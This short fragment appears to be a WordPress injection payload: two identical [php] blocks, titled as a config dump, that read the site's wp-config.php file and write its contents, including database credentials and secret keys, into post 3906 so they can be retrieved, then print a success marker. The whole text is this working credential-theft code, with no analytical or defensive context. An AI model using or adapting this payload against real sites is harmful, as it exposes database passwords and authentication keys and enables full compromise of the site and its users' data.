WP_CONFIG_DUMP_1780208506
[php]
global $wpdb;
$config = file_get_contents(“/var/www/html/wp-config.php”);
$wpdb->update(“wp_posts”, array(“post_content” => $config), array(“ID” => 3906));
echo “CONFIG_STORED_IN_3906”;
[/php]
[php]
global $wpdb;
$config = file_get_contents(“/var/www/html/wp-config.php”);
$wpdb->update(“wp_posts”, array(“post_content” => $config), array(“ID” => 3906));
echo “CONFIG_STORED_IN_3906”;
[/php]